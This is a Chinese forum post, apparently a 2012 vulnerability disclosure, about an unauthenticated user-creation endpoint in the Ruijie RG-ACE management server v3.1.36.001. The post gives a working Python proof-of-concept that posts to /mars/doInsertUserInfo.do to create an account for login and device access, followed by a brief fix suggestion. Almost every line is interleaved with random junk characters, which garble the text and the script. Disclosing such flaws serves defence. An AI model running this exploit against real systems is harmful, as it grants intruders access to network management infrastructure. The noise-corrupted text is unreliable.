找回密码
 立即注册
查看: 2967|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
2 p' y+ r% v: K  t& E" x- L& e
9 P; Z# c- r) N  O' L, `# S/ }7 d
7 f, |; d! m9 A7 d% y5 Q测试的具体版本是# N$ n) w$ `. S6 W# ?2 ]7 Q
产品名称: 锐捷应用控制引擎
/ f; j& d- h- P9 C+ Y8 a  K版本号: 3.1.36.001 TC
1 N) g4 S9 j: l- Q2 f" N% D0 ]& N编译时间: 201104291730. D6 _. Q9 P! M  T; l4 \3 O0 b
) i& n5 }: z( R/ `7 _) J

( I8 R8 l9 `. s9 u漏洞证明:
5 g! E3 C( h+ H. N + j' @' H1 ]; X$ L
* d% E6 ]' Z# |, i* K( C# l+ C, Q
- \- k9 b2 a+ ^7 L) h4 @
& h+ w7 q; ~3 J2 L

9 B* {* r1 u* h  Q4 C" I" G; o* N" L' z
执行脚本# h/ w) W' n" Z- V  ~* c/ m
#! /usr/bin/env python  l/ G- N% T$ T
#coding=gbk. Q' w' W6 Y7 w+ c3 R( D8 Z" t0 U
#RG-ACE管理服务器 V3.1.36.001
+ Q/ C# U' n( t2 Aimport urllib2, urllib,cookielib
7 r1 `* X# ?( V; p* [url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
% e% \6 c) P0 U) g9 L0 Eopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))" {' B! }4 Y4 E1 l* b
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]4 T5 l6 J! A, q3 }
post=(("event","userManager.doInsertUserInfo"),: m0 m# p8 K6 A* |! A
("useractionname","addButtonValue"),
0 s% s& Q7 Z& O$ X% W("useropermanager","userManager"),; P, q5 ]' b; W& `, y1 B
("userName","t"), #######账号自己加7 F8 B% f8 `3 ]& V
("pwd","aaaaaa"),######密码自己加3 R; C0 N# A, \
("trueName","ad"),
2 N+ ?: m( L3 G. ^9 ]( _("email",""),4 X3 S7 n+ U. C  N0 T+ X
("mobilePhone",""),
) o) i9 v5 c  {2 \6 q("officePhone",""),
- ?# B9 k' G/ k; m("addr",""),8 r! Z9 v1 {% q+ I: ?
("submit","确定"))$ `. n; ?# b4 }& u
urllib2.install_opener(opener)
$ H; k. V" ~& }, c* M, v7 Np=urllib2.urlopen(url, urllib.urlencode(post)).read()
' I/ I3 X7 h8 kprint "Done"
3 V; w( G8 U8 _4 }0 q6 Z* B/ S+ G3 h. T$ u' D9 X& ]
登录,连接设备: `  z/ @% u, N' b( a4 `

: }1 s( P( x; D( ]: [6 W) D, \3 w) n& v; y
. U/ j( N% c8 L2 [! [, Z' d8 ^
& |+ V8 z/ V4 s# K7 N
" |, c( v( }6 b5 u
默认的管理员admin权限更大点8 r# I" d5 v3 f+ N

' Y& r% W# O+ {7 g
7 ~  v( i  S$ t$ T! |: N7 v: u& k2 t1 L/ A5 s8 W) u7 y' ^
8 z9 ?, N* j: ?% ~

+ V" ]- r9 D2 Z: b  q: L( y修复方案:6 q. k$ a& A* \( d" r' O
加强对接口的权限验证3 W8 B6 l% ^5 w& [8 ~  F
; O1 t4 M% O3 }& a$ K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表